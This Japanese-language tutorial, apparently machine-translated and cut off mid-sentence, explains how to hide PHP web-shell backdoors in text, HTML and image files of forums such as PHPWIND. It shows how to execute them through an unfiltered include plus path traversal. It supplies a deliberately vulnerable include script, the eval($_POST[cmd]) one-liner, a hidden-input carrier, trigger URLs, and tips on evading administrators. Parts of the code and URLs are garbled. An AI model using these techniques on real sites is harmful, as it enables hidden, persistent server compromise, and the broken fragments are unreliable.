PHP は拡張子 php を持つファイルのみを解析するため、PHP ステートメントをイメージに挿入しただけでは実行されないことを知っておく必要があります。したがって、画像に隠された PHP ステートメントを実行できる必要があります。 PHP の呼び出し関数 (include、require など) を使用するだけです。
数日前にトロイの木馬を写真に隠すという記事をまだ覚えています。つまり、PHP ファイル内で include("x.gif") などのステートメントを使用して、イメージに隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、イメージを直接呼び出すと、PHP について少し知っている人であれば、不審な点を見つけるのは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。
include 関数は PHP で頻繁に使用されるため、多くのセキュリティ上の問題が発生します。たとえば、PHPWIND1.36 の脆弱性は、include の背後にある変数のフィルタリングが不足していることが原因です。これから、同様のステートメントを構築して PHP ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、PHPWIND フォーラムに次のステートメントを挿入します。 < ''?@include includeud/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>一般管理者は見ることができません。
include 関数を使用すると、txt、html、画像ファイルなどのさまざまな種類のファイルに PHP トロイの木馬を隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。
まず、PHP ファイル test.php を作成します。ファイルの内容は
次のとおりです。
$test=$_GET['テスト'];
@include 'test/'.$test;
?>
Txt ファイルは一般に説明ファイルなので、ディレクトリの説明ファイルに 1 文のトロイの木馬を入れることができます。 TXT ファイル t.txt を作成するだけです。 Trojan <?eval($_POST[cmd]);?> という文を t.txt ファイルに貼り付けます。次に、 http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > にアクセスします。 txt の内容が OK であることが判明したら、lanker micro PHP バックドア クライアントのトロイの木馬アドレスをhttp://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?に追加します。 PHPWIND_ROOT=../robots.txt > パスワードに cmd を追加するだけで、実行によって返される結果を確認できます。
HTML ファイルの場合、通常はテンプレート ファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のような隠し属性を持つテキスト ボックスを HTML に追加します。<input type=hidden value="<?eval($ _POST[cmd ]);?>"> その後、上記と同じ方法を使用します。実行で返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。ソース ファイルの内容を <input type=hidden value="C:Uniserver2_7swwwtest"> として表示します。ディレクトリは C:Uniserver2_7swwwtest として取得できます。
次に、画像ファイルについて話しましょう。最も有害な手口は、画像内にトロイの木馬を隠すことです。画像を直接編集して、画像の最後に <?eval($_POST[cmd]);?> を挿入できます。
テスト後、通常は画像に影響はありません。次に、クライアントのトロイの木馬アドレスを同様に追加します<